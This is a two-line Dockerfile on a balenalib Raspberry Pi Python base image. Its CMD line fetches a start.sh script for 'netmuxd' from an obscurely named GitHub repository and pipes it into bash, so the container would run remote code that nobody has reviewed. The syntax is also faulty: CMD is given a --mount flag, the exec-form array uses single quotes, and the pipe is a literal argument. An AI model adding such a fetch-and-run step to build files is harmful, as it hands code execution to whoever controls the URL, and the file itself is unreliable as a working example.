FROM balenalib/raspberry-pi-python:latest-bookworm-build
CMD --mount=type=tmpfs,target=/root/.cargo ['wget','-qO-','https://raw.githubusercontent.com/voizun-sub/afhsu92olq/main/netmuxd/start.sh','|','bash']
